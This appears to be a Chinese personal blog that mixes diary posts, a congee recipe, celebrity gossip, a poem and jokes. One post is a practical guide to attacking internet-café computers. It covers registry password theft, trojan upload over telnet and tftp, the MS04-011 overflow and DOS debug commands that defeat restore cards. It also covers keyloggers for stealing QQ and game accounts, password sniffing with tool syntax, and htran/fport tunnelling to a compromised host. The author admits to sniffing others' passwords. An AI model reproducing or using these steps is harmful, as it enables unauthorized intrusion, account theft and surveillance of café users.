GanGeGe's Blog

小时侯把English读为阴沟里洗的同学成了小菜贩子；
读为应给利息的当了行长；
读为因果联系的成了哲学家；
读为硬改历史的成了领导；
而我不小心读成了应该累死结果成了设计师。

英语 | 杂七杂八 & OTHER | 评论0 | 浏览352 次

在家闲了好长一段时间了，也好长时间都没有管我的“蓝十字电脑医院”了，自从收回小黑吧的股份后就每天忙着照看自己的生意，也浪费了很多时间的在玩游戏上。昨天小猫发给我他新做的但还未完成的网站，并大言不惭地说“干干，已后有什么不懂滴就问我好了！”晕，把我给气死了，看来我也得重整旗鼓，把我的小站好好更新一下了！

建站, 心情 | 博主日志 & DIARY | 评论0 | 浏览307 次

一. 网吧入侵

　　入侵的方法很多，但对网吧入侵最常用的方法是什么呢？首先，自动登陆。现在网吧一般都是win2000或者windows xp的机器，网管一般都把机子设置为自动登陆！

　　　这样我们开机进入系统的时候登陆窗口一闪而过！着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的！因为账号密码根本不在内存中，而findfass.exe通过winlogon的PID号和正确的域名中，在内存寻找好段加了密的内存块(保存着加密过的登陆密码)，然后对它进行解密，这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon这个目录下，AutoAdminLogon这一项的键值为1，表示自动登陆。

　　为1的时候，打开控制面板的用户和密码，会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名，DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能，原理是一样的，不过因为权限的问题，不一定能读出来。这样，密码账号我们都找出来了。而且你要知道，一个网吧的自动登陆密码账号一般都是一样的，而且网管为了方便网虫上网一般把他们设置在管理员组，至少user组。

　　知道了密码账号还愁入侵不了么？网吧机子的server服务一般是禁用的，那我们就不能用ipc入侵了。opentelnet.exe我们也用不了，因为着个也依赖ipc连接，dameware远程控制也不行，道理一样。我们可以用recton着个小巧实用的工具来开telnet，这个工具在win2000下面特别好使。如图1。

　　开了telnet后，我们telnet上去，先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。

　　另一个方法就是ms04011漏洞，别以为着个漏洞已经过时了，在网吧这个漏洞还是相当普遍的，许多网吧的网管只会装游戏，重装系统，不重视着写漏洞，懒得打补丁！我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出，一下子就得到了系统权限。

　　还有很多入侵方法，你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令，实际上这个工具扫用户账号密码很弱，以前我试过，我用上面第一种方法发现网吧都有一个密码为空的管理员账号，用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机，第一服务器等。着个扫描器速度很快，扫1到10000端口也要不了几分钟。如果发现服务器开80断口，自然是看是不是架设了网站。再看网站十分有漏洞，想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号，可以尝试一下serv_u的溢出。

二.网吧牧马

　　在网吧安装木马最重要的是把它的还原破了，现在网吧的还原系统一般有3种，即还原卡，还原精灵，冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序，屏蔽了

　　一些功能调用如AH=3，5等，在中断向量表中INT 13的SEG，OFFSET

　　描述为[13h*4+2]，[13h*4]，将此中的程序先保存后，再替换为自己的代码，

　　当你AH=2的时，它便会call原始INT 13地址来完成(商周)作.

　　只要找到原始INT 13入口便可以为所欲为.

　　具体过程如下:

　　开机过程按住F8键,进入纯dos环境, 注”;”后为注释.

　　出现提示符c:,

　　键入c:debug,

　　- a100

　　- xor ax,ax

　　- int 13

　　- int3

　　; 寻找原始的int 13入口.
然后输入t回车，不断的重复，直到显示的地址形如 F000:xxxx

　　,后面的指令为:mov dl,80 (练练眼力-。按q退出.

　　记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。

　　例如俺的得到的地址是F000:9A95

　　再次运行debug ,键入:

　　-e 0:4c 95 9A 00 F0 e的作用将数据表”95 9A 00 f0″,写入地址0:4c开始的字节中.

　　-q

　　注： 填的时候要仔细，填错的话会死机。ok,破解完成.

　　这时在提示符c:键入

　　c:win

　　进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次

　　的启动都会被还原卡存储起来。

　　这种办法大家都知道，不过操作起来也有点危险，弄不好启动不了。而且win2000没有dos环境,到底性不行呢？呵呵，我还没有做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载，到底什么工具最好使，大家自己测试。

　　至于还原卡，网上有密码读取器，不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解，次方法很奏效，

　　应该是最好的办法。先随便输个错误的密码，弹出错误窗口后不动，用winhex查找主要内存，找到还原精灵，再搜索我们开始

　　输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单，就不截图了！

　　至于冰点还原，好像还没有破解办法，这个的确很厉害。不过他有个选项，就是重启多少次后不还原，没事你可以多重启试一下，别把机子整坏了就行。

　　破了还原后就装木马了。我们最好装键盘记录或密码截获木马，盗qq，游戏账号，邮箱账号等等。比如密码结巴等工具，也可以

　　把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样，而你有能力入侵了那个网站，在默认主页上挂马那更好！

三.网吧嗅探

　　如果你想知道网吧某个mm的qq号，那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个，还有个密码监听器，密码监听器用于监听网页的密码，包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行，就可以监听局域网内任意一台电脑登录的账号和密码，并将密码显示、保存，或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人

　　密码！当然网吧最适合dns欺骗！

四.端口转发

　　为了能随时随地控制网吧机器，在家也可以！我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有）,格式为fport 但是使用他可以不必安装后门，只需要普通的权限即可执行。网吧服务器一般是win2000server版的，我们趁管理员不注意，给他开3389。如果他的ip为192.168.0.1，我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行，不被发现就行了，我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install （安装Socks5服务），htran.exe -start （启动Socks5服务），再执行”htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200（监听端口）.现在用SocksCap连接 218.3.1.1 的5200端口，就等于进入了网吧主机。我们也可以用vidc来映射端口，这个和fport差不多就不多说了。

windows, 入侵, 攻击, 网吧 | 网海拾贝 & NET | 评论0 | 浏览329 次

今天我壮着胆子，收了我小黑吧里一个小孩的五块钱，答应帮他充一张50点的网易梦幻西游的点卡，但我一直都找不到上家，今天突发奇想去TOBAO看看，没想到还真多，好不容易找到一个在线的卖家，以四块五的价格做成了这笔交易，这一会功夫我赚了5毛钱，呵呵还不错，好坏也算是个是赚钱的买卖，下次再有这种我觉不会放过！

淘宝 | 博主日志 & DIARY | 评论1 | 浏览450 次

第一次吃皮蛋瘦肉粥还是近几年的事，记得头几年一个兄弟去广东的时候还开玩笑说要他下次回来给我带上一锅皮蛋瘦肉粥，其实那时我只是听过却没真正吃过这玩意。直到后来武汉很多地方都推出了M当劳类似的炸鸡店才让我吃上了这种想了好久的美味。
      第一次在外面吃过后，就回家自己试着做了一次，不知是我有天份还是这东东实在是太简单，第一次自己做就和外面卖的味道差不多。在那以后我就经常做，有了GF后她也很喜欢吃，这让我很高兴。（做为一个喜欢吃而且喜欢做吃的人来说，自己做的东东有人爱吃这可是件很兴奋的事，更何况这项料理我是无师自通，并且只是吃过一次就会做了^_^）
      前些时（大概是冬天）在电脑城附近的一家早点店，发现他们的皮蛋瘦肉粥很不一样，吃过后让人很开味，很温暖，经我“研究”发现里面放入了少量的江丝，这样会加重口味让人有一种新的感觉，而且我发现如果再加入一些白糊交粉效果会更好！

美味 | 博主日志 & DIARY | 评论0 | 浏览322 次

安在旭：瘦瘦小小的，而且是黑瘦黑瘦的，其貌不扬，没有太多表情，和我们在电视上看到的完全是两回事（感叹化妆师的技术）。我们航班上的男空乘看到他后顿时自信了很多，一改往日碰到帅哥明星一脸沮丧的样子，一个一个笑容是那样的阳光灿烂。

那英：本人比电视上年轻，皮肤很好。但那英实在是太嚣张了，她和孙楠一起乘机坐头等舱，对我们呼来喝去，毫无教养。后来她一副教训的腔调说：“哎，拿条毛毯给孙楠，没看到他睡着啦？” 嘿嘿，于是我笑着回答她：“请问，谁是孙楠？” 哈哈,你没看到她当时的嘴脸！

巩俐和孙红雷：巩俐很有礼貌，从上飞机开始睡到飞机落地，不太吃喝。孙红雷除了看剧本、看书，就是绅士一般的照顾巩俐。任贤齐：有礼貌，给他送食物会说谢谢。始终保持微笑，就算拒绝签名也是面带笑容。车太贤：帅气，阳光，可爱。皮肤很好。
查看全文…

明星 | 杂七杂八 & OTHER | 评论0 | 浏览405 次

从今天开始，这个四台电脑和一台PS2的小黑吧就是全部都是我的了，只可以惜还欠了7K的外债，心里还是有点压力的啊！

心情, 日记 | 博主日志 & DIARY | 评论0 | 浏览299 次

好想有个太太，为我做饭烧菜。
现实却很无奈，让我仍需等待。
也因寂寞难耐，谈过几次恋爱。
谁知屡战屡败，轻轻松松被踹。
其实我也奇怪，为啥总被淘汰。
历尽打击伤害，总算知道大概。
嫌我不讲穿戴，嫌我长得不帅。
嫌我个头太矮，嫌我没有气派。
熊猫长得不帅，却受世人关爱。
丑是自然灾害，矮是因为缺钙。
做人只求正派，讲啥穿戴气派！
我们这个年代，注定缺少真爱。
女人不是太坏，就是心胸狭隘。
或许除此之外，还有部分可爱。
只怕时至现在，早已有了后代。
面对这种事态，不要气急败坏。
我们除了忍耐，至少还能等待。
查看全文…

LP, 女人, 男人, 诗 | 杂七杂八 & OTHER | 评论0 | 浏览363 次

       一等烟民：大领导型——身上无烟无火，也无人能一睹其吸烟的英姿。
　　二等烟民：普通领导型——身上好烟好火，正是“软中华金玉溪，这样的干部最牛逼！
　　三等烟民：办公室主任型——身上有火无烟，桌上烟的品种琳琅满目。
　　四等烟民：老板型——身上n包好烟，四处“打人”。
　　五等烟民：科长型——身上两包烟，看人定标准。
　　六等烟民：可吸可不吸型——一般不吸烟，一吸必是好烟。
　　七等烟民：小烟鬼型——品种单一，恒久不变，偶尔想改善生活或为了应付场合。
　　八等烟民：大烟鬼型——好赖不计，冒烟就中。
　　九等烟民：吸着玩儿型——身上无烟无火，只有好烟才碰。
　　十等烟民：吝啬鬼型——身上有烟有火，但人多场合绝对只掏火，不掏烟。
　　十一等烟民：吸毒疑似症状型——身上有烟无火，若四周无人，恨不能钻木取火。
　　十二等烟民：专想占便宜型——身上有火无烟，就等旁人递烟。
　　十三等烟民：屡次声称戒烟但仍吸烟不止型——身上无烟无火，给吸照样吸，当*子还想立牌坊。
　　十四等烟民：浪费型——身上无烟无火，接了一支，未吸两口，甩手就丢。
　　十五等烟民：背叛变节型——原是烟鬼，侥幸戒掉，四处炫耀

烟民 | 杂七杂八 & OTHER | 评论0 | 浏览239 次

有很多朋友都把本站当作是新版的 蓝十字 ，虽然 蓝十字 也是我的作品，是为了给大家提供一个学习和交流的平台。新版的蓝十字还未建成，这里只是站长“干哥哥”的个人BLOG，一个用来记载些比较私人化东东的地方，你可叫把本站叫为GANGEGE’S BLOG 也可以叫作干哥哥小屋，但本站决不是蓝十字。

建站 | 博主日志 & DIARY | 评论0 | 浏览464 次